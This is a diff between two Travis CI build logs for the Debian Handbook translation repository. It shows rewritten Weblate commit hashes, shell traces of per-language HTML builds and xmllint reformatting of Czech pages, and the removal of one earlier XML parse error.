+commit dc9b02b86f94c8617cfdd50a4eda0263b0d4f81d
 Author:     Louies <louies0623@gmail.com>
 AuthorDate: Tue Jan 15 02:06:01 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8235,7 +8263,7 @@ CommitDate: Tue Jan 15 03:55:51 2019 +0100
  zh-TW/09_unix-services.po | 15 ++-------------
  1 file changed, 2 insertions(+), 13 deletions(-)
 
-commit 48c63ec26f33d3eca261ebe934708c9a5d45385a
+commit d651f9ec559eb073e82d037e0e5ce30e52779d8b
 Author:     Louies <louies0623@gmail.com>
 AuthorDate: Tue Jan 15 01:53:32 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8246,7 +8274,7 @@ CommitDate: Tue Jan 15 03:56:02 2019 +0100
  zh-TW/92_short-remedial-course.po | 37 +++++++++++++------------------------
  1 file changed, 13 insertions(+), 24 deletions(-)
 
-commit ddcd9e4c2def4751958cf843b23caab5262ae07c
+commit fe099a6416216512d727e5d91219111345925596
 Author:     Louies <louies0623@gmail.com>
 AuthorDate: Tue Jan 15 03:55:49 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8257,7 +8285,7 @@ CommitDate: Tue Jan 15 04:56:36 2019 +0100
  zh-TW/90_derivative-distributions.po | 4 ++--
  1 file changed, 2 insertions(+), 2 deletions(-)
 
-commit 0ddd130a9b9d7060ad71fb281806c0d83d2c9189
+commit 61017a0e86049ccc750123d7c93a3fcee13134b3
 Author:     Louies <louies0623@gmail.com>
 AuthorDate: Tue Jan 15 07:57:48 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8268,7 +8296,7 @@ CommitDate: Tue Jan 15 09:56:22 2019 +0100
  zh-TW/70_conclusion.po | 60 +++++++++++++++++++++-----------------------------
  1 file changed, 25 insertions(+), 35 deletions(-)
 
-commit f6b1cd9c0aecf706b18b87addd58dca369cea09a
+commit 2205d97f215ba9e6b9488f5f3bc7be93dc2ffff1
 Author:     Louies <louies0623@gmail.com>
 AuthorDate: Tue Jan 15 08:48:54 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8279,7 +8307,7 @@ CommitDate: Tue Jan 15 09:56:23 2019 +0100
  zh-TW/90_derivative-distributions.po | 28 ++++++++++++++--------------
  1 file changed, 14 insertions(+), 14 deletions(-)
 
-commit 499f2403133581cfe6cb26070e244213b170bfcf
+commit c4f81648f990cef09512a1fb467f257d4faa84c5
 Author:     Louies <louies0623@gmail.com>
 AuthorDate: Sun Jan 20 00:50:34 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8290,7 +8318,7 @@ CommitDate: Sun Jan 20 01:55:37 2019 +0100
  zh-TW/08_basic-configuration.po | 15 ++-------------
  1 file changed, 2 insertions(+), 13 deletions(-)
 
-commit 0b805a1e6c79f25bcbd9fcc2b5a5707c043fcc27
+commit 139088f8facdd801239119e39f67d4304059becf
 Author:     Louies <louies0623@gmail.com>
 AuthorDate: Sun Jan 20 00:50:32 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8301,7 +8329,7 @@ CommitDate: Sun Jan 20 01:55:39 2019 +0100
  zh-TW/09_unix-services.po | 4 ++--
  1 file changed, 2 insertions(+), 2 deletions(-)
 
-commit c47ff46cec1fcdc8b4b8037fceeb9e9ae8dfe65f
+commit 41248e3de6f8270eda420a798d1756ad2bd49f71
 Author:     Louies <louies0623@gmail.com>
 AuthorDate: Sat Jan 19 23:49:34 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8312,7 +8340,7 @@ CommitDate: Sun Jan 20 01:55:48 2019 +0100
  zh-TW/90_derivative-distributions.po | 6 +++---
  1 file changed, 3 insertions(+), 3 deletions(-)
 
-commit ae1464efdce0deeffab6c79486b6fcc74bb47dc5
+commit 8262a0f78936e8ef25074bef242ae7c5ed99af56
 Author:     Louies <louies0623@gmail.com>
 AuthorDate: Sun Jan 20 00:50:33 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8323,7 +8351,7 @@ CommitDate: Sun Jan 20 01:55:51 2019 +0100
  zh-TW/92_short-remedial-course.po | 4 ++--
  1 file changed, 2 insertions(+), 2 deletions(-)
 
-commit 70a8c2adb1f4e891ea02785c59db232d7214ae22
+commit 6fd01754455b0a059ff90c8fa4c1720b4f3d109e
 Author:     Louies <louies0623@gmail.com>
 AuthorDate: Sun Jan 27 14:20:34 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8334,7 +8362,7 @@ CommitDate: Sun Jan 27 15:56:35 2019 +0100
  zh-TW/90_derivative-distributions.po | 6 +++---
  1 file changed, 3 insertions(+), 3 deletions(-)
 
-commit f2c256b0471fba455cbf37f8b3ea85ce6eb324a0
+commit 39d5d629a5171660990497f6ceff5116ca8dde45
 Author:     Andika Triwidada <andika@gmail.com>
 AuthorDate: Fri Feb 15 12:51:11 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8345,7 +8373,7 @@ CommitDate: Fri Feb 15 14:52:13 2019 +0100
  id-ID/14_security.po | 17 ++++++-----------
  1 file changed, 6 insertions(+), 11 deletions(-)
 
-commit c6573ade49a8c2ede2200f36381bb91b8dd703d7
+commit 6ddad718b41b12bf7b6f6211026e5a62047b4d37
 Author:     Andika Triwidada <andika@gmail.com>
 AuthorDate: Sat Feb 16 11:45:18 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8356,7 +8384,7 @@ CommitDate: Sat Feb 16 13:51:09 2019 +0100
  id-ID/14_security.po | 5 ++---
  1 file changed, 2 insertions(+), 3 deletions(-)
 
-commit 084d29ed075da0bc59321ac8a458261c77f7f732
+commit 503131389fec5ec9560c852ad74bfaaed576ac95
 Author:     AYANOKOUZI, Ryuunosuke <i38w7i3@yahoo.co.jp>
 AuthorDate: Sat Feb 16 11:45:18 2019 +0000
 Commit:     AYANOKOUZI, Ryuunosuke <i38w7i3@yahoo.co.jp>
@@ -8364,7 +8392,7 @@ CommitDate: Sat Feb 16 13:51:09 2019 +0100
 
     Sync PO files to Weblate
 
-commit 9c8e36ba5245eb6a0f8f4e7df381b25186bf3887
+commit 222d9d6e5fe9f690b469593e929e270d04a4abf6
 Author:     AYANOKOUZI, Ryuunosuke <i38w7i3@yahoo.co.jp>
 AuthorDate: Sat Feb 16 11:45:18 2019 +0000
 Commit:     AYANOKOUZI, Ryuunosuke <i38w7i3@yahoo.co.jp>
@@ -8403,7 +8431,7 @@ CommitDate: Sat Feb 16 13:51:09 2019 +0100
  pot/Revision_History.pot            |   4 +-
  25 files changed, 744 insertions(+), 672 deletions(-)
 
-commit 3e01add8eb65aed51472b65b0f360c48e3d46119
+commit 9e7002d43c2bbb7b54268f536842537cf67bcec9
 Author:     AYANOKOUZI, Ryuunosuke <i38w7i3@yahoo.co.jp>
 AuthorDate: Sat Feb 16 11:45:18 2019 +0000
 Commit:     AYANOKOUZI, Ryuunosuke <i38w7i3@yahoo.co.jp>
@@ -8861,11 +8889,11 @@ weblate	git://git.weblate.org/debian-handbook.git (fetch)
 weblate	git://git.weblate.org/debian-handbook.git (push)
 + git branch --all --verbose --verbose
   jessie/master/proposal/put_backcover_and_website_as_appendix               3ab4d18f [tweek/jessie/master/proposal/put_backcover_and_website_as_appendix] Put backcover and website as appendix
-  jessie/master/translation/origin                                           675562fa [origin/jessie/master] radek 889
+  jessie/master/translation/origin                                           07024dad [origin/jessie/master] cs-CZ: fix syntax error
   jessie/master/translation/weblate                                          be47c15e [weblate/jessie/master: ahead 1] Sync PO files to Weblate
-* stretch/master/build                                                       3e01add8 [origin/stretch/master: ahead 42] Update PO files
+* stretch/master/build                                                       9e7002d4 [origin/stretch/master: ahead 43] Update PO files
   stretch/master/translation/origin                                          f04e65bc [origin/stretch/master] Merge branch 'jessie/master' into stretch/master
-  remotes/origin/jessie/master                                               675562fa radek 889
+  remotes/origin/jessie/master                                               07024dad cs-CZ: fix syntax error
   remotes/origin/stretch/master                                              f04e65bc Merge branch 'jessie/master' into stretch/master
   remotes/tweek/jessie/master/proposal/put_backcover_and_website_as_appendix 3ab4d18f Put backcover and website as appendix
   remotes/weblate/jessie/master                                              12741125 id-ID: Translated using Weblate.
@@ -8875,7 +8903,7 @@ weblate	git://git.weblate.org/debian-handbook.git (push)
 + return 0
 + return 0
 + exit 0
-+docker exec --user travis debian_unstable /home/travis/build/l/debian-handbook-test/.travis/script.sh systems:build/repository/translation/status /home/travis/tmp/base.mKmY0h/build /home/travis/build/l/debian-handbook-test/.travis/translation-status.pl
++docker exec --user travis debian_unstable /home/travis/build/l/debian-handbook-test/.travis/script.sh systems:build/repository/translation/status /home/travis/tmp/base.D31sXm/build /home/travis/build/l/debian-handbook-test/.travis/translation-status.pl
 + set -eu
 + alias git_commit=git \
 	commit \
@@ -8931,17 +8959,17 @@ weblate	git://git.weblate.org/debian-handbook.git (push)
 	--pretty 2 \
 	--output \
 
-+ main systems:build/repository/translation/status /home/travis/tmp/base.mKmY0h/build /home/travis/build/l/debian-handbook-test/.travis/translation-status.pl
++ main systems:build/repository/translation/status /home/travis/tmp/base.D31sXm/build /home/travis/build/l/debian-handbook-test/.travis/translation-status.pl
 + readonly MODE=systems:build/repository/translation/status
 + shift 1
-+ systems_build_repository_translation_status /home/travis/tmp/base.mKmY0h/build /home/travis/build/l/debian-handbook-test/.travis/translation-status.pl
-+ systems_build_repository_translation_status_pre /home/travis/tmp/base.mKmY0h/build /home/travis/build/l/debian-handbook-test/.travis/translation-status.pl
-+ readonly _GIT_WORK_TREE=/home/travis/tmp/base.mKmY0h/build
++ systems_build_repository_translation_status /home/travis/tmp/base.D31sXm/build /home/travis/build/l/debian-handbook-test/.travis/translation-status.pl
++ systems_build_repository_translation_status_pre /home/travis/tmp/base.D31sXm/build /home/travis/build/l/debian-handbook-test/.travis/translation-status.pl
++ readonly _GIT_WORK_TREE=/home/travis/tmp/base.D31sXm/build
 + readonly TRANSLATION_STATUS=/home/travis/build/l/debian-handbook-test/.travis/translation-status.pl
 + configure_translation_status
 + return 0
 + return 0
-+ cd /home/travis/tmp/base.mKmY0h/build
++ cd /home/travis/tmp/base.D31sXm/build
 + generte_translation_status
 + echo ar-MA cs-CZ da-DK de-DE el-GR en-US es-ES fa-IR fr-FR hr-HR id-ID it-IT ja-JP ko-KR nb-NO nl-NL pl-PL pt-BR ro-RO ru-RU sv-SE tr-TR vi-VN zh-CN zh-TW
 + generte_translation_status_lang ar-MA
@@ -9197,10 +9225,10 @@ weblate	git://git.weblate.org/debian-handbook.git (push)
 + return 0
 + cd -
 + return 0
-+ return 0
++ return 0/
+
 + exit 0
-/
-+docker exec --user travis debian_unstable /home/travis/build/l/debian-handbook-test/.travis/script.sh systems:build/repository/build /home/travis/tmp/base.mKmY0h/build /home/travis/tmp/base.mKmY0h/fifo
++docker exec --user travis debian_unstable /home/travis/build/l/debian-handbook-test/.travis/script.sh systems:build/repository/build /home/travis/tmp/base.D31sXm/build /home/travis/tmp/base.D31sXm/fifo
 + set -eu
 + alias git_commit=git \
 	commit \
@@ -9256,14 +9284,14 @@ weblate	git://git.weblate.org/debian-handbook.git (push)
 	--pretty 2 \
 	--output \
 
-+ main systems:build/repository/build /home/travis/tmp/base.mKmY0h/build /home/travis/tmp/base.mKmY0h/fifo
++ main systems:build/repository/build /home/travis/tmp/base.D31sXm/build /home/travis/tmp/base.D31sXm/fifo
 + readonly MODE=systems:build/repository/build
 + shift 1
-+ systems_build_repository_build /home/travis/tmp/base.mKmY0h/build /home/travis/tmp/base.mKmY0h/fifo
-+ systems_build_repository_build_pre /home/travis/tmp/base.mKmY0h/build /home/travis/tmp/base.mKmY0h/fifo
-+ readonly _GIT_WORK_TREE=/home/travis/tmp/base.mKmY0h/build
-+ readonly _FIFO_DIR=/home/travis/tmp/base.mKmY0h/fifo
-+ readonly _LANGS_TXT=/home/travis/tmp/base.mKmY0h/fifo/langs.txt
++ systems_build_repository_build /home/travis/tmp/base.D31sXm/build /home/travis/tmp/base.D31sXm/fifo
++ systems_build_repository_build_pre /home/travis/tmp/base.D31sXm/build /home/travis/tmp/base.D31sXm/fifo
++ readonly _GIT_WORK_TREE=/home/travis/tmp/base.D31sXm/build
++ readonly _FIFO_DIR=/home/travis/tmp/base.D31sXm/fifo
++ readonly _LANGS_TXT=/home/travis/tmp/base.D31sXm/fifo/langs.txt
 + configure_git
 + export GIT_AUTHOR_NAME=AYANOKOUZI, Ryuunosuke
 + export GIT_AUTHOR_EMAIL=i38w7i3@yahoo.co.jp
@@ -9297,14 +9325,14 @@ weblate	git://git.weblate.org/debian-handbook.git (push)
 + readonly _GIT_LOCAL_GITHUB_BRANCH=stretch/master/gh-pages
 + return 0
 + return 0
-+ cd /home/travis/tmp/base.mKmY0h/build
++ cd /home/travis/tmp/base.D31sXm/build
 + git checkout stretch/master/build
 Already on 'stretch/master/build'
-Your branch is ahead of 'origin/stretch/master' by 42 commits.
-  (use "git push" to publish your local commits)
 + local _EXIT_STATUS=0
 + build_html_all
 + local _EXIT_STATUS=0
+Your branch is ahead of 'origin/stretch/master' by 43 commits.
+  (use "git push" to publish your local commits)
 + sort
 + find -maxdepth 1 -type d -name ??-?? -printf %f\n
 + local _LANG=
@@ -9327,19 +9355,7 @@ Your branch is ahead of 'origin/stretch/master' by 42 commits.
 + local _LOG_STDERR=log/cs-CZ/build-html/stderr.log
 + local _EXIT_STATUS=0
 + sh -eu ./bin/build-html --opts=--quiet --lang=cs-CZ
-+ cat log/cs-CZ/build-html/stdout.log log/cs-CZ/build-html/stderr.log
-ERROR: failed to build HTML output for cs-CZ
-
-not well-formed (invalid token) at line 4, column 395, byte 588:
-<!DOCTYPE para PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
-]>
-<para>Tato kniha má své vlastní webové stránky, které obsahují různé užitečné prvky. Zejména obsahují online verzi knihy s odkazy na kliknutí, a případné chyby. Neváhejte si je prohlédnut a nechat nám nějakou zpětnou vazbu. Rádi si přečteme vaše komentáře nebo zprávy. Pošlete je e-mailem na <email>hertzog@debian.org</email> (Raphaël) a <email>lolando@debian.org</email> (Roland).<ulink type=""block"" url=""http://debian-handbook.info/""></ulink></para>
-==========================================================================================================================================================================================================================================================================================================================================================================================================^
- at /usr/lib/x86_64-linux-gnu/perl5/5.28/XML/Parser.pm line 187.
-+ build_html_lang_stderr_tidy cs-CZ log/cs-CZ/build-html/stderr.log
-+ _EXIT_STATUS=1
-+ return 1
-+ _EXIT_STATUS=1
++ return 0
 + read _LANG
 + build_html_lang da-DK
 + local _LANG=da-DK
@@ -9571,18 +9587,18 @@ not well-formed (invalid token) at line 4, column 395, byte 588:
 + sh -eu ./bin/build-html --opts=--quiet --lang=zh-TW
 + return 0
 + read _LANG
-+ rm /home/travis/tmp/base.mKmY0h/fifo/langs.txt
-+ return 1
-+ _EXIT_STATUS=1
++ rm /home/travis/tmp/base.D31sXm/fifo/langs.txt
++ return 0
 + git clean --dry-run --force -d -x
 Would remove log/
 Would remove publish/
 Would remove tmp/
 /
 + cd -
-+ return 1
-+_EXIT_STATUS=1
-+docker exec --user travis debian_unstable /home/travis/build/l/debian-handbook-test/.travis/script.sh systems:build/repository/build/targets/prepare /home/travis/tmp/base.mKmY0h/build /home/travis/tmp/base.mKmY0h/divert /home/travis/tmp/base.mKmY0h/fifo
++ return 0
++ return 0
++ exit 0
++docker exec --user travis debian_unstable /home/travis/build/l/debian-handbook-test/.travis/script.sh systems:build/repository/build/targets/prepare /home/travis/tmp/base.D31sXm/build /home/travis/tmp/base.D31sXm/divert /home/travis/tmp/base.D31sXm/fifo
 + set -eu
 + alias git_commit=git \
 	commit \
@@ -9638,17 +9654,17 @@ Would remove tmp/
 	--pretty 2 \
 	--output \
 
-+ main systems:build/repository/build/targets/prepare /home/travis/tmp/base.mKmY0h/build /home/travis/tmp/base.mKmY0h/divert /home/travis/tmp/base.mKmY0h/fifo
++ main systems:build/repository/build/targets/prepare /home/travis/tmp/base.D31sXm/build /home/travis/tmp/base.D31sXm/divert /home/travis/tmp/base.D31sXm/fifo
 + readonly MODE=systems:build/repository/build/targets/prepare
 + shift 1
-+ systems_build_repository_build_targets_prepare /home/travis/tmp/base.mKmY0h/build /home/travis/tmp/base.mKmY0h/divert /home/travis/tmp/base.mKmY0h/fifo
-+ systems_build_repository_build_targets_prepare_pre /home/travis/tmp/base.mKmY0h/build /home/travis/tmp/base.mKmY0h/divert /home/travis/tmp/base.mKmY0h/fifo
-+ readonly _GIT_WORK_TREE=/home/travis/tmp/base.mKmY0h/build
-+ readonly _GIT_DIVERT_DIR=/home/travis/tmp/base.mKmY0h/divert
-+ readonly _FIFO_DIR=/home/travis/tmp/base.mKmY0h/fifo
-+ readonly _FILES_TXT=/home/travis/tmp/base.mKmY0h/fifo/files.txt
++ systems_build_repository_build_targets_prepare /home/travis/tmp/base.D31sXm/build /home/travis/tmp/base.D31sXm/divert /home/travis/tmp/base.D31sXm/fifo
++ systems_build_repository_build_targets_prepare_pre /home/travis/tmp/base.D31sXm/build /home/travis/tmp/base.D31sXm/divert /home/travis/tmp/base.D31sXm/fifo
++ readonly _GIT_WORK_TREE=/home/travis/tmp/base.D31sXm/build
++ readonly _GIT_DIVERT_DIR=/home/travis/tmp/base.D31sXm/divert
++ readonly _FIFO_DIR=/home/travis/tmp/base.D31sXm/fifo
++ readonly _FILES_TXT=/home/travis/tmp/base.D31sXm/fifo/files.txt
 + return 0
-+ cd /home/travis/tmp/base.mKmY0h/build
++ cd /home/travis/tmp/base.D31sXm/build
 + find publish tmp log -name *.html
 + sort
 + local _FILE_PATH=
@@ -10265,6 +10281,518 @@ Would remove tmp/
 + xmllint --noout publish/ar-MA/Debian/9/html/debian-handbook/workstation.html
 + xmllint --pretty 2 --output publish/ar-MA/Debian/9/html/debian-handbook/workstation.html publish/ar-MA/Debian/9/html/debian-handbook/workstation.html
 + read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/advanced-administration.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/advanced-administration.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/advanced-administration.html publish/cs-CZ/Debian/9/html/debian-handbook/advanced-administration.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/apt.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/apt.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/apt.html publish/cs-CZ/Debian/9/html/debian-handbook/apt.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/backcover.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/backcover.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/backcover.html publish/cs-CZ/Debian/9/html/debian-handbook/backcover.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/basic-configuration.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/basic-configuration.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/basic-configuration.html publish/cs-CZ/Debian/9/html/debian-handbook/basic-configuration.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/case-study.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/case-study.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/case-study.html publish/cs-CZ/Debian/9/html/debian-handbook/case-study.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/conclusion.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/conclusion.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/conclusion.html publish/cs-CZ/Debian/9/html/debian-handbook/conclusion.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/debian-packaging.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/debian-packaging.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/debian-packaging.html publish/cs-CZ/Debian/9/html/debian-handbook/debian-packaging.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/derivative-distributions.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/derivative-distributions.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/derivative-distributions.html publish/cs-CZ/Debian/9/html/debian-handbook/derivative-distributions.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/existing-setup.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/existing-setup.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/existing-setup.html publish/cs-CZ/Debian/9/html/debian-handbook/existing-setup.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/foreword.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/foreword.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/foreword.html publish/cs-CZ/Debian/9/html/debian-handbook/foreword.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/index.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/index.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/index.html publish/cs-CZ/Debian/9/html/debian-handbook/index.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/installation.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/installation.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/installation.html publish/cs-CZ/Debian/9/html/debian-handbook/installation.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/network-infrastructure.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/network-infrastructure.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/network-infrastructure.html publish/cs-CZ/Debian/9/html/debian-handbook/network-infrastructure.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/network-services.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/network-services.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/network-services.html publish/cs-CZ/Debian/9/html/debian-handbook/network-services.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/packaging-system.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/packaging-system.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/packaging-system.html publish/cs-CZ/Debian/9/html/debian-handbook/packaging-system.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/preface.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/preface.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/preface.html publish/cs-CZ/Debian/9/html/debian-handbook/preface.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.acknowledgments.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.acknowledgments.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.acknowledgments.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.acknowledgments.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.administration-interfaces.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.administration-interfaces.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.administration-interfaces.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.administration-interfaces.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.after-first-boot.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.after-first-boot.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.after-first-boot.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.after-first-boot.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.apparmor.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.apparmor.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.apparmor.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.apparmor.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-cache.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-cache.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-cache.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-cache.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-frontends.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-frontends.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-frontends.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-frontends.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-get.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-get.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-get.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-get.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.aptosid.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.aptosid.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.aptosid.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.aptosid.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.asynchronous-task-scheduling-anacron.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.asynchronous-task-scheduling-anacron.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.asynchronous-task-scheduling-anacron.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.asynchronous-task-scheduling-anacron.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.automated-installation.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.automated-installation.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.automated-installation.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.automated-installation.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.automatic-upgrades.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.automatic-upgrades.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.automatic-upgrades.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.automatic-upgrades.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.backup.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.backup.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.backup.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.backup.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.becoming-package-maintainer.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.becoming-package-maintainer.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.becoming-package-maintainer.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.becoming-package-maintainer.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.book-structure.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.book-structure.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.book-structure.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.book-structure.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.building-first-package.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.building-first-package.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.building-first-package.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.building-first-package.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.coexistence-with-other-packaging-systems.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.coexistence-with-other-packaging-systems.html
